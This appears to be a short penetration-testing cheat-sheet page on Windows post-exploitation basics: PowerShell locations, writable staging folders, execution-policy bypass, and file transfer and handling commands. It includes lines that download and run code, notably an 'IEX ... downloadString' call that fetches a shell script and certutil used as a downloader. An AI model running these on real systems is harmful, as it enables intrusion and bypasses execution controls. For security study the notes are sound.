basic

Powershell location

C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Writable Paths

C:\Windows\Temp
C:\Users\<USER>\Desktop\
C:\Users\Public\
C:\Documents and Settings\Public\
C:\Documents and Settings\<USER>\Desktop\

PS styles

PS> $host
> powershell -c <cmd>
> powershell.exe -exec bypass -Command <>

Cmds

# download file
certutil.exe -urlcache [-split] -f <source> <destination>
PS> wget <source> -OutFile <dest>
PS> Invoke-WebRequest -Uri <source> -Outfile <out-path>
powershell -c (New-Object System.Net.WebClient).downloadFile('<source>', '<dest>')
powershell -exec bypass IEX(New-Object Net.WebClient).downloadString('/shell.ps1')
wget.vbs https://gist.github.com/sckalath/ec7af6a1786e3de6c309

#run file
> ren <src> <dest>
PS> Start-Process <file.exe>

# rename 
PS> Rename-Item -Path <file> -NewName <new-file>

# move 
> copy /Y <src> <dest>
PS> Move-Item -Path <src> -Destination <dest>
# /E copies entire dir-structure
> robocopy <src> <dest> /E

# delete
PS> Remove-Item -Path <file> [-recursive]

PS shorthand

# get child items
PS> gci [--recurse]

# get content
PS> gc FILE

Arch based windows directory structure

Session type32 bit folder64 bit folder

32 bit session

C:\Windows\system32

C:\Windows\sysNative\

64 bit session

C:\Windows\sysWOW64

C:\Windows\system32\

Previousdirtyc0wNextwindows-enumeration

Last updated